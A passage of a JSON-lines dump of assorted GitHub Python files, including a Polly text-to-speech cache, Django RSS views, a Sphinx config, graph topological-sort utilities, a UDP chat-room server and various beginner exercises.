voice, format, path):\n with get_db() as db:\n db.execute(\"\"\"insert into polly_requests (voice, format, text, path, date)\n values (?, ?, ?, ?, ?)\"\"\",\n (voice, format, text, path, datetime.datetime.utcnow().isoformat()))\n\n\ndef cache_stream(stream, text, voice, format):\n path = os.path.join(download_dir, str(uuid.uuid4()))\n save_stream(stream, path)\n save_request(text, voice, format, path)\n return path\n\n\ndef remove_double_quotation_marks(s):\n return s.translate(str.maketrans(dict.fromkeys(['\\u201C', '\\u201D', '\\u0022'])))\n\n\ndef synthesize_cached(text, voice, format):\n data = find_request(text, voice, format)\n if data is None:\n stream = synthesize_with_aws(text, voice, format)\n return cache_stream(stream, text, voice, format)\n else:\n return data['path']\n\n\ndef preprocess(text):\n return ' '.join(x.strip(punctuation).lower() for x in text.split())\n\n\ndef synthesize_by_words(stream, text, voice):\n for sent in nltk.tokenize.sent_tokenize(remove_double_quotation_marks(text)):\n for token in nltk.tokenize.word_tokenize(preprocess(sent)):\n src_path = synthesize_cached(token, voice, 'pcm')\n with open(src_path, 'rb') as ff:\n stream.write(ff.read())\n\n\ndef synthesize_by_sentences(stream, text, voice):\n sents = nltk.tokenize.sent_tokenize(remove_double_quotation_marks(text))\n for sent in sents:\n src_path = synthesize_cached(sent, voice, 'pcm')\n with open(src_path, 'rb') as ff:\n stream.write(ff.read())\n\n\nclass UnrecognizedUnit(Exception):\n pass\n\n\ndef synthesize_to_stream(stream, text, voice, unit):\n if unit == 'word':\n synthesize_by_words(stream, text, voice)\n elif unit == 'sentence':\n synthesize_by_sentences(stream, text, voice)\n else:\n raise UnrecognizedUnit(unit)\n\n\ndef synthesize(text, path, voice='Joanna', unit='word'):\n with open(path, 'wb') as f:\n synthesize_to_stream(f, text, voice, unit)\n\n\ndef say(text, voice='Joanna', unit='word'):\n p = pyaudio.PyAudio()\n stream = p.open(format=pyaudio.paInt16, channels=1, rate=16000, output=True)\n synthesize_to_stream(stream, text, voice, unit)\n time.sleep(1)\n stream.stop_stream()\n stream.close()\n p.terminate()\n","repo_name":"krisfris/python-polly","sub_path":"polly/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9660321751","text":"import pymongo\nimport tkinter as tk\nimport tkinter.font as tkFont\nfrom tkinter import *\nfrom tkinter import ttk\n\n\n\nclient = pymongo.MongoClient('mongodb://localhost:27017')\n\nmydb = client['Employee']\n\ncol = mydb[\"employeeinformation\"]\n\nlist1=[]\nx = list(col.find())\n\nlist2 = []\n\nfor i in range(len(x)):\n\n list1 = []\n ss = str(x[i])\n a = ss.find(\"firstname\")\n a = a + 13;\n\n b = ss.find(\"lastname\")\n b = b - 4\n list1.append(ss[a:b])\n\n a = ss.find(\"lastname\")\n a = a + 12;\n\n b = ss.find(\"dep\")\n b = b - 4\n list1.append(ss[a:b])\n\n a = ss.find(\"dep\")\n a = a + 7;\n\n b = ss.find(\"}\")\n b = b - 1\n list1.append(ss[a:b])\n\n list2.append(list1)\n\n#list2 = [['abhi','patil','co'],['roman','reigns','co'],['seth','rollins','lkj']]\n\nwin = Tk()\n\nfrn = Frame(win)\nfrn.pack(side=tk.LEFT,padx=20)\n\ntv = ttk.Treeview(frn,columns=(1,2,3,4),show=\"headings\",height=\"5\")\n\ntv.pack()\n\ntv.heading(1,text=\"ID\")\ntv.heading(2,text=\"Name\")\ntv.heading(3,text=\"Lastname\")\ntv.heading(4,text=\"department\")\n\nfor i in range(len(x)):\n\n tv.insert('','end',values=list2[i])\n\nwin.title(\"Customer Data\")\n#win.geometry(\"650x500\")\n#win.resizable(False,False)\nwin.mainloop()\n\n\n\n\n\n\n","repo_name":"Abhishekpatil12/Healthcaresystem","sub_path":"show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42787160733","text":"def SquaringNumbers():\n numbers = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\n # 🚨 Do Not Change the code above 👆\n\n #Write your 1 line code 👇 below:\n\n squared_numbers = [ n*n for n in numbers]\n\n #Write your code 👆 above:\n\n print(squared_numbers)\n\n\ndef filterEvenNumbers():\n numbers = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\n # 🚨 Do Not Change the code above\n\n #Write your 1 line code 👇 below:\n\n result = [n for n in numbers if n%2==0]\n\n #Write your code 👆 above:\n\n print(result)\n\n\ndef dicComprehension():\n with open(\"file1.txt\") as file1:\n data1 = file1.readlines()\n\n with open(\"file2.txt\") as file2:\n data2 = file2.readlines()\n \n result = [int(number) for number in data1 if number in data2]\n\n\n # Write your code above 👆\n\n print(result)\n\n\ndef dicNumberOfLetters():\n sentence = \"What is the Airspeed Velocity of an Unladen Swallow?\"\n # Don't change code above 👆\n\n # Write your code below:\n words = sentence.split(\" \")\n result = {word:len(word) for word in words}\n\n print(result)\n\n\ndef temperatureConversion():\n weather_c = {\n \"Monday\": 12,\n \"Tuesday\": 14,\n \"Wednesday\": 15,\n \"Thursday\": 14,\n \"Friday\": 21,\n \"Saturday\": 22,\n \"Sunday\": 24,\n }\n # 🚨 Don't change code above 👆\n\n\n # Write your code 👇 below:\n\n def fahenheit(temp):\n return (temp * 9/5) + 32\n\n weather_f = {day:fahenheit(value) for (day, value) in weather_c.items()}\n print(weather_f)\n\n\n# iteration through pandas dataframe\n\nimport pandas as pd\n\ndic = {\n \"student\":[\"Ajay\",\"Amal\",\"Praveen\"],\n \"score\":[50,70,90]\n}\n\nstudent_data = pd.DataFrame(dic)\n\n # inbuilt loop in pandas package\nfor (index,row) in student_data.iterrows():\n print(row)","repo_name":"ajay007e/100-Days-Of-Code---Python","sub_path":"day 026/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42295727326","text":"from django.http import HttpResponseRedirect, Http404 \nfrom django.shortcuts import render_to_response, get_object_or_404, redirect\nfrom django.template import RequestContext\nfrom django.views.generic import list_detail\n\nfrom misc.json_encode import JSONResponse \nfrom .forms import AddFeed, EditSettings\nfrom .models import Feed, FeedItem, FavoriteItem\nfrom .utils import user_filter\n\ndef item_list(request, filter_type, template_name='rss/feeditem_list.html'):\n if filter_type == 'all':\n feed_item_list = FeedItem.objects.all()\n else:\n feed_item_list = user_filter(FeedItem.objects.all())\n feed_item_list = feed_item_list.order_by('-updated_datetime')\n return render_to_response(template_name, {'feed_item_list': feed_item_list}, context_instance=RequestContext(request))\n\ndef mark_favorite(request, object_id):\n \"\"\"\n Mark new item as favorite\n \"\"\"\n feed_item = get_object_or_404(FeedItem, id=object_id)\n fav_item, is_new = FavoriteItem.objects.get_or_create(feed_item=feed_item)\n if request.is_ajax():\n return JSONResponse({'status': 'ok', 'text': 'Marked as favorite'}, False)\n return redirect(request.META.get('HTTP_REFERER', 'feed_item_list'))\n\ndef unmark_favorite(request, object_id):\n \"\"\"\n Unmark new item favorite status\n \"\"\"\n fav_item = get_object_or_404(FavoriteItem, feed_item__id=object_id)\n fav_item.delete()\n if request.is_ajax():\n return JSONResponse({'status': 'ok', 'text': 'Unmarked favorite'}, False)\n return redirect(request.META.get('HTTP_REFERER', 'feed_item_list'))\n\ndef edit_settings(request, form_class=EditSettings, template_name='rss/edit_settings'):\n \"\"\"\n Select email for notification and keywords for filtering feed items\n \"\"\"\n if request.method == 'POST':\n form = form_class(request.POST)\n if form.is_valid():\n form.save()\n return redirect('feed_item_list')\n else:\n form = form_class()\n\n if request.is_ajax():\n template_name += '_ajax'\n template_name += '.html'\n return render_to_response(template_name, {'form': form}, context_instance=RequestContext(request))\n\ndef feed_add(request, form_class=AddFeed, template_name='rss/feed_add'):\n if request.method == 'POST':\n form = form_class(request.POST)\n if form.is_valid():\n form.save()\n return redirect('feed_list')\n else:\n form = form_class()\n\n if request.is_ajax():\n template_name += '_ajax'\n template_name += '.html'\n return render_to_response(template_name, {'form': form}, context_instance=RequestContext(request))\n\ndef feed_delete(request, object_id):\n feed = get_object_or_404(Feed, id=object_id)\n feed.delete()\n return redirect(request.META.get('HTTP_REFERER', 'feed_list'))\n","repo_name":"frol/rss-filter","sub_path":"apps/rss/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"71025173032","text":"import os\nimport sys\nimport sphinx_rtd_theme\nsys.path.insert(0, os.path.abspath('../..'))\ntry:\n import IPython\n print(\"ipython: %s, %s\" % (IPython.__version__, IPython.__file__))\nexcept ImportError:\n print(\"no ipython\")\n\n# -- Project information -----------------------------------------------------\n\nproject = 'famafrench'\ncopyright = '2020, Christian Jauregui'\nauthor = 'Christian Jauregui'\n\n# The full version, including alpha/beta/rc tags\nversion = '0.1.4'\nrelease = version\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = ['sphinx.ext.autodoc',\n 'sphinx.ext.autosummary',\n 'sphinx.ext.autosectionlabel',\n 'sphinx.ext.doctest',\n 'sphinx.ext.extlinks',\n 'sphinx.ext.githubpages',\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.napoleon',\n 'sphinx.ext.todo',\n 'sphinx.ext.viewcode',\n 'numpydoc',\n 'IPython.sphinxext.ipython_directive',\n 'IPython.sphinxext.ipython_console_highlighting',\n ]\n# Example NumPy Style Python Docstrings:\n# https://www.sphinx-doc.org/en/master/usage/extensions/example_numpy.html#example-numpy\n\n\n# TODO settings\ntodo_include_todos = True\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = []\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\n# source_suffix = [\".rst\", \".md\"]\nsource_suffix = '.rst'\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'sphinx_rtd_theme'\nhtml_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\n# Add any paths that contain custom static files (such as style sheets) here, relative to this directory.\n# They are copied after the builtin static files, so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = []\n\n# -- Options for intersphinx extension ---------------------------------------\n# Example configuration for intersphinx: refer to the Python standard library.\nintersphinx_mapping = {\n \"statsmodels\": (\"http://www.statsmodels.org/dev/\", None),\n \"matplotlib\": (\"https://matplotlib.org\", None),\n \"scipy\": (\"https://docs.scipy.org/doc/scipy/reference/\", None),\n \"python\": (\"https://docs.python.org/3/\", None),\n \"numpy\": (\"https://numpy.org/devdocs/\", None),\n \"np\": (\"https://numpy.org/devdocs/\", None),\n \"pandas\": (\"https://pandas.pydata.org/pandas-docs/stable/\", None),\n \"pd\": (\"https://pandas.pydata.org/pandas-docs/stable/\", None),\n \"pandas-datareader\": (\"https://pydata.github.io/pandas-datareader/devel/\", None),\n}\n\n# -- Options for napolean settings extension ---------------------------------------\nnapoleon_numpy_docstring = True\nnapoleon_include_private_with_doc = True\nnapoleon_use_admonition_for_examples = False\nnapoleon_use_admonition_for_notes = False\nnapoleon_use_admonition_for_references = False\n\n\n# -- Options for numpydoc settings extension ---------------------------------------\nnumpydoc_use_autodoc_signature = True\nnumpydoc_xref_param_type = True\nnumpydoc_class_members_toctree = False\nnumpydoc_xref_aliases = {\n \"Figure\": \"matplotlib.figure.Figure\",\n \"Axes\": \"matplotlib.axes.Axes\",\n \"AxesSubplot\": \"matplotlib.axes.Axes\",\n \"DataFrame\": \"pandas.DataFrame\",\n \"Series\": \"pandas.Series\",\n}\n# Whether to show all members of a class in the Methods and Attributes sections automatically. True by default.\n# Also see: https://stackoverflow.com/questions/35438697/section-ignored-by-sphinx-using-numpy-style-formatting\nnumpydoc_show_class_members = False\n\n\n# -- Options for autosummary settings extension ---------------------------------------\nautosummary_generate = True\nautosummary_generate_overwrite = False\n\n\n# -- Options for autoclass settings extension ---------------------------------------\nautoclass_content = \"class\"\n\n\n# -- Options for autosectionalabel settings extension ---------------------------------------\nautosectionlabel_prefix_document = True","repo_name":"christianjauregui/famafrench","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"23729896174","text":"TEST_INPUT_FILE='input/input_2019_06_test.txt'\nINPUT_FILE='input/input_2019_06.txt'\n\norbits = {}\nwith open(INPUT_FILE) as f:\n\tfor line in f.readlines():\n\t\tvalues = line.rstrip().split(')')\n\t\torbits[values[1]]=values[0]\n\t\ndef find_orbit_path(planet):\n\tif planet == 'COM': return []\n\tinner = orbits[planet]\n\tval = [inner] + find_orbit_path(inner)\n\treturn val\n\ntotal_orbits=0\nfor planet in orbits.keys():\n\torbs = find_orbit_path(planet)\n\tprint (planet, orbs)\n\ttotal_orbits += len(orbs)\nprint(total_orbits)\n\ndef find_orbit_delta(item1, item2):\n\tpath1 = set(find_orbit_path(item1))\n\tpath2 = set(find_orbit_path(item2))\n\n\tuni = path1.union(path2)\n\tinters = path1.intersection(path2)\n\treturn (len(uni)-len(inters))\n\nprint(find_orbit_delta('YOU', 'SAN'))\n\n","repo_name":"sdvinay/advent_of_code","sub_path":"2019_06.py","file_name":"2019_06.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39608629929","text":"from targetPage import Element, TargetPage, Driver\r\n\r\npage_names = [\"\", \"\"]\r\nURLs = ['https://www.', \r\n 'https://www.']\r\nclass_names_for_waiting_loading_page = ['', '']\r\nURL_tables = [[Element(\"//*[@id=\\\"\\\"]/div[3]/div[3]/table\", \"XPATH\"), 2, \r\n [Element(\"\", \"CLASS_NAME\"), [-1, \"기업명\"], [-1, \"홈페이지\"]]],\r\n [Element(\"//*[@id=\\\"\\\"]/div[1]/table\", \"XPATH\"), -1, \r\n [Element(\"\", \"CLASS_NAME\"), [0, \"법인명\"], [1, \"홈페이지\"]]]]\r\nPagings = [Element(\"//*[@id=\\\"\\\"]/div[3]/div[4]\", \"XPATH\"),\r\n Element(\"//*[@id=\\\"\\\"]/div[2]\", \"XPATH\")]\r\nstart_page = [1, 11]\r\n\r\ntarget_pages = []\r\ndriver = Driver('../chromedriver.exe')\r\nfor i in range(len(URLs)-1, -1, -1):\r\n class_name_for_waiting_loading_page = class_names_for_waiting_loading_page[i]\r\n target_page = TargetPage(page_names[i], driver, URLs[i], Element(class_name_for_waiting_loading_page, \"CLASS_NAME\"), \r\n URL_tables[i], Pagings[i], start_page[i])\r\n target_pages.append(target_page)\r\n\r\nfor target_page in target_pages:\r\n target_page.OpenPage()\r\n # 이후 ref-1을 참고해서 웹 페이지가 잘 열렸는지 확인하고 다음 step 진행하기\r\n if not target_page.CheckPageLoadingDone():\r\n print(target_page.name, \"페이지 명시적 대기 실패\")\r\n else:\r\n # 홈페이지가 있는 기업들 및 해당 url들을 추출한다\r\n target_page.ExportURLs()\r\n ","repo_name":"syoh1113/web-crawler-with-selenium","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45030811814","text":"from io import StringIO\nfrom django.core.management import call_command, CommandError\nfrom django.test import TestCase\nfrom galaxy_ng.app.models.auth import Group\n\n\nclass TestAssignPermissionCommand(TestCase):\n def setUp(self):\n super().setUp()\n group = Group.objects.create(name='administrator')\n group.save()\n\n def test_command_output(self):\n with self.assertRaisesMessage(\n CommandError,\n 'Error: the following arguments are required: group, permissions'\n ):\n call_command('assign-permission')\n\n def test_add_permission(self):\n out = StringIO()\n call_command(\n 'assign-permission', 'administrator', 'galaxy.add_namespace',\n stdout=out)\n self.assertIn(\n \"Assigned requested permission to group 'administrator'\",\n out.getvalue())\n admin_group = Group.objects.get(name='administrator')\n self.assertIn(\n 'add_namespace',\n [perm.codename for perm in admin_group.permissions.all()]\n )\n\n def test_add_multiple_permissions(self):\n out = StringIO()\n call_command('assign-permission', 'administrator',\n 'galaxy.add_namespace', 'galaxy.change_namespace', stdout=out)\n self.assertIn(\"Assigned requested permission to group 'administrator'\", out.getvalue())\n admin_group = Group.objects.get(name='administrator')\n self.assertIn(\n 'add_namespace',\n [perm.codename for perm in admin_group.permissions.all()]\n )\n\n def test_group_not_found(self):\n with self.assertRaisesMessage(\n CommandError,\n 'Group system:foo does not exist. Please provide a valid group '\n 'name'\n ):\n call_command('assign-permission', 'system:foo',\n 'galaxy.add_namespace')\n\n def test_permission_not_found(self):\n out = StringIO()\n with self.assertRaisesMessage(\n CommandError,\n \"Permission galaxy.foo not found. Please provide a valid \"\n \"permission in the form 'app_label.codename'\"\n ):\n call_command('assign-permission', 'administrator', 'galaxy.foo',\n stdout=out)\n\n def test_permission_format(self):\n out = StringIO()\n with self.assertRaisesMessage(\n CommandError,\n \"Invalid permission format for foo. Expecting \"\n \"'app_label.codename'\"\n ):\n call_command('assign-permission', 'administrator', 'foo',\n stdout=out)\n","repo_name":"ansible/galaxy_ng","sub_path":"galaxy_ng/tests/unit/app/management/commands/test_assign_permission.py","file_name":"test_assign_permission.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"72"} +{"seq_id":"32110429592","text":"# programme to input student details and view them\n\n# helen o'shea\n# 20210218\n\n# function to show the menu\ndef show_menu():\n print(\"What would you like to do? \\n\\\n \\t(a) Add new student\\n\\\n \\t(v) View students\\n\\\n \\t(q) Quit\")\n option = input(\"Type one letter (a/v/q): \").strip() # takes input from user \n return option\n\n# function to add student first name last name and modules\ndef do_add(students):\n myStudent = {} # initalise the dict\n myStudent['firstname'] = input(\"Enter your first name: \").strip()\n myStudent['lastname'] = input(\"Enter your last name: \").strip()\n myStudent['modules'] = read_modules() # modules are entered via another function and called here\n students.append(myStudent) # add dict entries to the student list\n \n\n# function to add courses and grades\ndef read_modules():\n modules = []\n course = input(\"Enter the Module name:\" ).strip() # get entry for module name\n while course !=\"\": # do while course is entered i.e. it will stop if no info added\n module={}\n module['course'] = course\n module['grade'] = float(input(\"Enter the grade: \").strip()) # get entry for grade (as a float)\n modules.append(module) # \n course = input(\"Enter the Module name:\" ).strip() # ask for more input - if this is blank the function will return \n return modules \n\n\ndef view_modules(modules):\n print(\"Course Name\" \"\\tGrade\")\n for module in modules:\n print(\"{} \\t{}\".format(module['course'], module['grade']))\n\n# funtion to view the entries\ndef do_view(students):\n print(\"\\n\") # leave a gap between this function call and the show_menu function\n if len(students)<1: # if this is true then there are no entries to show\n print(\"your student list is empty\")\n for student in students:\n print(student['firstname'], \" \", student['lastname'])\n view_modules(student['modules'])\n\n\n\n# this function is the main function that calls the other functions\ndef main():\n students = [] # initalise student list\n option = show_menu() # show the menu \n while(option != 'q'): # while q has not been selected function will exit if q selected\n if option == 'a': # show option a\n do_add(students) # option a calls the function to add students\n elif option == 'v': # show option v\n do_view(students) # option v calls the function to show students\n elif option !='q': # catch for a non valid entry\n print(\"\\n\\nplease select either a,v or q\")\n option=show_menu() # show the menu again for more choices if q is not selected\n\n# this calls the main function\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Osheah/hospfcs2021","sub_path":"semester1/week05/studentsRedo.py","file_name":"studentsRedo.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39300320956","text":"#!/usr/bin/env python3\nimport argparse\nimport sys\n\nfrom uccaapp.api import ServerAccessor\n\ndesc = \"\"\"Convert a passage file to JSON format and upload to UCCA-App as a completed task\"\"\"\n\n\nclass AnnotationTaskCreator(ServerAccessor):\n def __init__(self, user_id, **kwargs):\n super().__init__(**kwargs)\n self.set_user(user_id)\n\n def create_task(self, filename, **kwargs):\n del kwargs\n with open(filename) as f:\n num = 0\n for line in f:\n fields = line.strip().split()\n if len(fields) != 2:\n sys.stderr.write(\"Error in line: \"+line.strip())\n continue\n user_id = fields[0]\n user_model = self.get_user(user_id)\n tok_task_out = self.get_task(fields[1])\n task_in = dict(type=\"ANNOTATION\", status=\"SUBMITTED\",\n project=self.project, user=user_model,\n passage=tok_task_out[\"passage\"], manager_comment=\"Reviews corpus\",\n user_comment=\"Test\", parent=tok_task_out,\n is_demo=False, is_active=True)\n self.create_annotation_task(**task_in)\n num += 1\n print(\"Uploaded %d tasks successfully.\" % num, file=sys.stderr)\n\n @staticmethod\n def add_arguments(argparser):\n argparser.add_argument(\"filename\", help=\"a file where each line is a \")\n ServerAccessor.add_user_id_argument(argparser)\n ServerAccessor.add_arguments(argparser)\n\n\ndef main(**kwargs):\n AnnotationTaskCreator(**kwargs).create_task(**kwargs)\n\n\nif __name__ == \"__main__\":\n argument_parser = argparse.ArgumentParser(description=desc)\n AnnotationTaskCreator.add_arguments(argument_parser)\n main(**vars(argument_parser.parse_args()))\n sys.exit(0)\n","repo_name":"shachardon/ucca","sub_path":"uccaapp/create_annotation_tasks.py","file_name":"create_annotation_tasks.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"32769245566","text":"#!/usr/bin/python\n\n'''\nA function that implements a substitution cipher.\nthe function takea two parameters, the message you want to encrypt, \nand a string that represents the mapping of the 26 letters in the alphabet. \n'''\n\nimport string\n\ndef cipher(message, str_mapping):\n upperCase_mapping = str_mapping.upper()\n encrypt = []\n for c in message:\n if c in string.ascii_uppercase:\n sub = str_mapping.upper()[string.ascii_uppercase.index(c)]\n encrypt.append(sub)\n elif c in string.ascii_lowercase:\n sub = str_mapping[string.ascii_lowercase.index(c)]\n encrypt.append(sub)\n else:\n encrypt.append(c)\n result = \"\".join(encrypt)\n return result\n \n \n \n \nr = cipher(\"Write a function that implements a substitution cipher.\",\"efghijklmnopqrstuvwxyzabcd\")\nprint(r) ","repo_name":"gkl1107/Python-algorithm","sub_path":"alphabet_cipher.py","file_name":"alphabet_cipher.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12037797542","text":"\"\"\"\nThis class contains algorithms for topologically sorting graphs.\n\"\"\"\n\nfrom transiter.services.servicemap.graphutils import (\n datastructures,\n operations,\n traversals,\n)\n\n\nclass ImpossibleToTopologicallySortGraph(Exception):\n \"\"\"\n Exception thrown if the inputted directed graph contains a cycle.\n \"\"\"\n\n\ndef basic_sort(graph: datastructures.AbstractGraph) -> datastructures.OrderedGraph:\n \"\"\"\n Topologically sort a directed graph.\n\n The algorithm here is the basic topological sort algorithm, except the\n sorting has the following property. If there are vertices A, B, C, such\n (A,B) and (B,C) are edges, and there are no other edges out of A and B\n and in to B and C, then A, B and C will be consecutive in the sorting.\n\n Raises ImpossibleToTopologicallySortGraph: if the graph cannot be sorted;\n i.e., it contains a cycle.\n \"\"\"\n sorted_nodes = []\n admissible_next_nodes = datastructures.Stack(graph.sources())\n node_to_in_node_count = {node: len(node.in_nodes) for node in graph.nodes()}\n\n while len(admissible_next_nodes) > 0:\n node = admissible_next_nodes.pop()\n sorted_nodes.append(node)\n for candidate_next_node in node.out_nodes:\n node_to_in_node_count[candidate_next_node] -= 1\n if node_to_in_node_count[candidate_next_node] == 0:\n admissible_next_nodes.push(candidate_next_node)\n\n if len(graph) != len(sorted_nodes):\n raise ImpossibleToTopologicallySortGraph\n\n return datastructures.OrderedGraph(graph, sorted_nodes)\n\n\ndef optimal_sort_for_trees(graph: datastructures.Tree) -> datastructures.OrderedTree:\n graph_reversed = False\n if graph.is_in_tree():\n graph.reverse()\n graph_reversed = True\n node_to_descendents_count = {}\n for node in traversals.post_order_dfs_traversal(graph.root):\n node_to_descendents_count[node] = 1 + sum(\n node_to_descendents_count[child_node] for child_node in node.out_nodes\n )\n ordered_graph = datastructures.OrderedTree(\n graph,\n traversals.pre_order_dfs_traversal(\n graph.root, sorting_key=node_to_descendents_count.get\n ),\n )\n if graph_reversed:\n ordered_graph.reverse()\n return ordered_graph\n\n\ndef tgt_sort(graph: datastructures.AbstractGraph) -> datastructures.OrderedGraph:\n tree_1, inner_graph, tree_2 = operations.calculate_tgt_decomposition(\n operations.calculate_transitive_reduction(graph.immutable())\n )\n\n labels = []\n for sub_graph, sorting_method in (\n (tree_1, optimal_sort_for_trees),\n (inner_graph, basic_sort),\n (tree_2, optimal_sort_for_trees),\n ):\n if sub_graph is None:\n continue\n new_labels = [node.label for node in sorting_method(sub_graph).nodes()]\n if len(labels) > 0:\n assert labels[-1] == new_labels[0]\n labels += new_labels[1:]\n else:\n labels = new_labels\n return datastructures.OrderedGraph(\n graph, [graph.get_node(label) for label in labels]\n )\n","repo_name":"jamespfennell/transiter-python","sub_path":"transiter/services/servicemap/graphutils/topologicalsort.py","file_name":"topologicalsort.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22911799838","text":"#Loop checking for positive number\npos_num = -1\nwhile pos_num <= 0:\n pos_num = float(input('Please type a positive number: '))\n if pos_num <= 0:\n print('Sorry but that is not a positibe number please try again!')\nprint(f'The number is: {pos_num}')\n\n#Ask for candy until yes...\ncandy_yes = 'no'\nwhile candy_yes.lower() != 'yes':\n candy_yes = input('Can I have a piece of candy? ')\nprint('Thank you!!!!')\n","repo_name":"Jammonjones/CSE-110","sub_path":"Week 4/firstlooppractice.py","file_name":"firstlooppractice.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20373806451","text":"\"\"\"\n Chat room\n env:python3.6\n socket fork\n 聊天室服务端程序\n\"\"\"\n\nimport os\nimport sys\nfrom socket import *\nfrom time import sleep\n\n# 服务器地址\nADDR = ('176.215.155.118', 2810)\n# 用户信息\nuser = {}\n\n\ndef main():\n \"\"\"\n 创建网络连接\n :return:\n \"\"\"\n # 套接字\n s = socket(AF_INET, SOCK_DGRAM)\n s.bind(ADDR)\n\n pid = os.fork()\n if pid < 0:\n return\n # 发送管理员消息\n elif pid == 0:\n while True:\n text = input(\"管理员消息:\")\n msg = \"C 管理员消息 \" + text\n s.sendto(msg.encode(), ADDR)\n if text == \"10秒后服务器关闭.\":\n for i in range(9):\n sleep(1)\n s.sendto(f\"C 管理员消息 {9-i}秒后服务器关闭.\".encode(), ADDR)\n for item in user:\n s.sendto(b\"EXIT\", user[item])\n sleep(1)\n sys.exit(\"服务器关闭.\")\n else:\n do_request(s)\n\n\ndef do_request(s):\n \"\"\"\n 接收各种客户端的请求\n :param s: 套接字\n :return:\n \"\"\"\n while True:\n data, addr = s.recvfrom(1024)\n msg = data.decode().split()\n\n # 区分请求类型\n if msg[0] == \"L\":\n do_login(s, msg[1], addr)\n elif msg[0] == \"C\":\n text = ' '.join(msg[2:])\n do_chat(s, msg[1], text)\n elif msg[0] == \"Q\":\n do_quit(s, msg[1])\n\n\ndef do_login(s, name, addr):\n \"\"\"\n 处理进入聊天室请求\n :param s: 套接字\n :param name: 用户姓名\n :param addr: 用户地址\n :return:\n \"\"\"\n if name in user or \"管理员\" in name:\n s.sendto(\"该用户已存在\".encode(), addr)\n return\n\n s.sendto(b\"OK\", addr)\n\n # 通知其他人\n msg_welcom = \"欢迎%s进入聊天室\" % name\n for key in user:\n s.sendto(msg_welcom.encode(), user[key])\n\n # 将用户加入\n user[name] = addr\n\n\ndef do_chat(s, name, text):\n \"\"\"\n 聊天过程,\n 将用户发送信息发送给其他所有用户\n :param s: 套接字\n :param name: 用户姓名\n :param text: 用户发送信息\n :return:\n \"\"\"\n\n msg = \"%s : %s\" % (name, text)\n for item in user:\n if item != name:\n s.sendto(msg.encode(), user[item])\n\n\ndef do_quit(s, name):\n \"\"\"\n 退出聊天室\n :param s: 套接字\n :param name: 用户姓名\n :return:\n \"\"\"\n msg = \"%s退出聊天室\" % name\n for item in user:\n if item != name:\n s.sendto(msg.encode(), user[item])\n else:\n s.sendto(b\"EXIT\", user[item])\n del user[name]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cx2810/ChatRoom","sub_path":"chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29866299790","text":"import math\n\nimport numpy as np\nfrom collections import Counter\n\nif __name__ == '__main__':\n# 4.有两个数组,x=np.array([436,556,607,899]),y=np.array([556,559,607,936,966]),请使用合适的方法获取两个数组的公共项\n x=np.array([436,556,607,899])\n y=np.array([556,559,607,936,966])\n arr6=np.intersect1d(x,y)\n print(arr6)\n\n\n\n\n# 5.计算给定数组np.array([33,35,60,70,85])和np.array([44,51,65,73,80])之间的欧氏距离\n# arr7=np.array([33,35,60,70,85])\n# arr8=np.array([44,51,65,73,80])\n# res=np.sqrt(np.sum(np.square(arr8-arr7)))\n# print(res)\n\n\n# 6.输入数字n,创建数字从 1 到 n 的 1 维数组arr,将 arr 中的所有奇数替换成 -1\n# arr4=np.arange(1,21)\n# 